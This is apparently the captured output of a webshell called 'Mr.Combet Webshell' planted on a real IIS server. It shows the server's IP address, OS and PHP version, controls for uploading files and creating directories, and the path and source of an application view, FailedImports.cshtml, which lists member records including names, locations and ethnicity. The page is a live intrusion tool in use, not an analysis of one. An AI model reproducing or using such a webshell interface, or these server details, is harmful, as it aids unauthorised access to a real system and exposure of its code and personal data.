Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
VITA
/
Views
/
HeiferMember
/
View File Name :
FailedImports.cshtml
@model List<RER_Project.DataAccess.Models.HeiferMemberM> @{ ViewBag.Title = "Failed Imported Members"; Layout = "~/Views/Shared/_Layout.cshtml"; } <h2>Failed Imports</h2> @if (Model == null || !Model.Any()) { <div class="alert alert-info">No failed records found.</div> } else { <div class="row pull-right" style="margin-right: 20px;"> <a href="/HeiferMember/Upload" class="btn btn-primary center-orientation"> Back to Upload Page </a> </div> <table class="table table-bordered table-striped"> <thead class="thead-dark"> <tr> <th>Member ID</th> <th>SHG ID</th> <th>SHG Province</th> <th>SHG District</th> <th>SHG Municipality</th> <th>Full Name</th> <th>Province</th> <th>District</th> <th>Municipality</th> <th>Ethnicity</th> <th>Commodity</th> <th>Status Detail</th> </tr> </thead> <tbody> @foreach (var item in Model) { <tr> <td>@item.memberid</td> <td>@item.shgid</td> <td>@item.shgprovincename</td> <td>@item.shgdistrictname</td> <td>@item.shgmunicipalityname</td> <td>@(@item.firstname + " " + @item.lastname)</td> <td>@item.provincename</td> <td>@item.districtname</td> <td>@item.municipalityname</td> <td>@item.ethnicity</td> <td>@item.commoditytype</td> <td>@item.status_detail</td> </tr> } </tbody> </table> }